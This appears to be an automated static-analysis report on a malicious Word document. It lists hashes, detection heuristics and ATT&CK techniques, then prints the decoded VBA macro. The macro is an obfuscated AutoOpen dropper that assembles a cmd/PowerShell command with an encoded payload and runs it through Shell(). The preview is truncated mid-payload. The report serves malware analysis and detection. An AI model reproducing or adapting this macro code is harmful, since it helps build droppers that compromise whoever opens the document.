Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ec00189498b668db…

MALICIOUS

Office (OLE)

103.0 KB Created: 2018-06-06 06:39:00 Authoring application: Microsoft Office Word First seen: 2019-05-10
MD5: 33382ca52e69f13d9ae8d2d4926e1a2a SHA-1: 0bf708ca53252d674e9d51a43c9bbe01cefbd6d2 SHA-256: ec00189498b668dbb44abd187b80de6e22ea79736d5793246c84b0e1ffc18484
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6574825-0' further supports this dropper functionality. No specific family could be identified.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6574798-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6574798-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11375 bytes
SHA-256: 2ee270d9f7960718c953ca2fc149c31adb097c22312bea09ba7f9e6193e512bc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ziuMCubYl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function mPDjjDmk()
On Error Resume Next
Diuml = Hex(GBzLMm + Hex(rKYjX) * 99339 + Round(wwHpaK))
JCtSvj = Cos(TEPcE)
sdiSR = CDate(nRCfHV)
hGGbEL = Cos(wwwEtR)
KXFJE = Hex(nDTSp + Hex(mWcHX) * 72078 + Round(LwtMdK))
dQviZ = Cos(zhduw)
DDwim = CDate(ljYETo)
TwGIQL = Cos(wnpXHp)
mPDjjDmk = KfIsSUPSYqX + Shell(TFZjUpY + Chr(RuLijJzspUT + vbKeyC + KIbhNo) + CGrWHtscHf + XNbIiwF + WZMXTuZ + MzwAiX + jTJBQjBtJwj + hDJrzqizz, 57795 - 57795)
QYEtiK = Hex(htPUH + Hex(risYw) * 13397 + Round(GctZM))
UXQNZW = Cos(vVHTLl)
alDqnJ = CDate(kUvRaA)
mnffhz = Cos(dRfqwJ)
End Function
Sub Autoopen()
On Error Resume Next
WWYMLc = Hex(VZCmCw + Hex(DVwwVK) * 17650 + Round(coiloz))
XApAJ = Cos(zWEPY)
QOcsi = CDate(Fawjr)
zUoujh = Cos(oiBCCw)
mPDjjDmk
nWFwr = Hex(zzsTzv + Hex(ijWWoJ) * 24390 + Round(paCnW))
khOMaw = Cos(PiUwrH)
zbUvoi = CDate(EHfNtj)
wwDLV = Cos(MSdHYz)
End Sub


Attribute VB_Name = "SABYzBjBNF"
Function CGrWHtscHf()
On Error Resume Next
KSiNN = Hex(JGsoSt + Hex(AlkQK) * 31521 + Round(hULCMB))
pAEfi = Cos(XtUFZ)
ljuVnH = CDate(YGRMZ)
PBhqGb = Cos(MKUFo)
Riolf = "md plP" + "JIwiIqinJo KjS" + "jWfIMmfwB" + "Mp" + "OtocRa" + "sZ aSNWcuBclOtb" + " &   "
nqdGQ = Hex(qSfDnz + Hex(vscOX) * 76467 + Round(jPCqDN))
ZiaMoj = Cos(TivzAh)
jkzuqi = CDate(IjwzRK)
XnnDDB = Cos(oErwS)
jwSRmihv = "  %^c^o^m^S^p^E" + "^c^%     %" + "^c" + "^o^m^" + "S^p^E^c^%     " + "/V    "
bNhOWG = Hex(AfEwMf + Hex(QuiPWW) * 5287 + Round(qIwzjR))
jGvYpF = Cos(CiaLPb)
jqqYEB = CDate(Zbbvqf)
YRZZd = Cos(wzAop)
wDsHPqEDcD = "     /" + "c         " + "  set %Zj" + "Rdi"
VrwoKH = Hex(DGRFZb + Hex(wGiTc) * 97515 + Round(YdQAml))
tmqCi = Cos(fBcmR)
PcPHMA = CDate(NKsSjL)
QwOjoY = Cos(IJUbD)
NQHsKQw = "cwjK" + "juVSbp%=jWC" + "RJfIESlj" + "sd" + "W&&set %Haoz" + "LirSU" + "Y%=p&&set " + "%R"
NkzdrC = Hex(jzIWDz + Hex(YIBUJq) * 83128 + Round(jnwwsR))
TvjJJ = Cos(dMOaiW)
Snrco = CDate(wzHzSM)
QBKhtK = Cos(ciNqu)
atDqHOuLb = "asCRowiY" + "Ajd%=o^w&&se" + "t %qnTO" + "oMXz" + "iztpbuX%" + "=EAECvOL" + "bR"
Dvwnuf = Hex(jivvT + Hex(ITHLv) * 26934 + Round(KUbCjj))
zfnaB = Cos(whDDUF)
sQlFON = CDate(BDUSSc)
fjTtGN = Cos(UDqVu)
CYWYub = "uXML" + "&&set %puEunRU" + "Ff" + "Wk%=!%Haoz" + "LirSUY%!&&" + "set %w" + "tGGopHBDn" + "cchoE%=UDOja"
LaQErp = Hex(EuiWnS + Hex(SvLVHZ) * 70666 + Round(wjJNs))
YMvkUc = Cos(anPbc)
tlAwF = CDate(PtYrVN)
Ascjv = Cos(wzfhnm)
vwzDVWp = "hinb" + "a&&set %Xv" + "FNKkK%=e^r&&" + "set " + "%jGiZjiUBlt" + "Lqw%=!"
qZrIw = Hex(fYrhzn + Hex(ZdiAU) * 49262 + Round(zbfwH))
wjBND = Cos(KmzqC)
vbiwJ = CDate(ftrET)
fNNPU = Cos(usAcz)
JDZSOM = "%RasCRowiYAj" + "d%!&&set %" + "PFFRmNJkT" + "GtLiR%=s&&se" + "t %bbszuoKomE" + "njnE" + "Q%=ANbZOaH" + "DzqJf"
WddjcR = Hex(mjkYzo + Hex(STSOc) * 84618 + Round(kiqzu))
ivJPT = Cos(jafhvQ)
cjkuoP = CDate(RwaamA)
mlunj = Cos(zuqXUF)
irJWhFOjVm = "k&&set %idTADM" + "qVb%=he&&" + "set %kbPYdH" + "kNrBVmkf%=ll&&"
CGrWHtscHf = Riolf + jwSRmihv + wDsHPqEDcD + NQHsKQw + atDqHOuLb + CYWYub + vwzDVWp + JDZSOM + irJWhFOjVm
End Function
Function XNbIiwF()
On Error Resume Next
EcmlX = Hex(BPjznB + Hex(TAlUjc) * 36357 + Round(zokuL))
ahpNai = Cos(WoJpCo)
pGlHlz = CDate(wIWor)
tHnCqM = Cos(bhqmN)
bnViF = "!%" + "puEunRUFfWk%!" + "!%jGi" + "ZjiUBltLqw%!!" + "%XvFNKkK%!!%" + "PFFR" + "mNJkTGtLiR" + "%!!%i" + "dTADMqVb%!!%"
nwMbf = Hex(oUkrCd + Hex(LSbZT) * 49445 + Round(wCPAHw))
XXHPzt = Cos(LSmjq)
DSJPl = CDate(hAzzI)
MfWlj = Cos(UhpQz)
Muibld = "kbPYdHkN" + "rBVmk" + "f%!  -e LgAgACg" + "AIAAkAHAAcwBoA" + "G8AbQBFAFsANA" + "BdACsAJABw" + "AHMASABPAG0AZQ"
bCjqzA = Hex(sdSiit + Hex(PjQqaX) * 97018 + Round(nNwalb))
JRmUj = Cos(iorAwJ)
tuAsr = CDate(vlQzqZ)
iPWuYP = Cos(fTAsJ)
wHnTwSm = "BbADMA" + "MABdACsA" + "Jw" + "BY" + "ACcAKQAgACgAbgB" + "FAFcALQBvAG" + "IAag
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.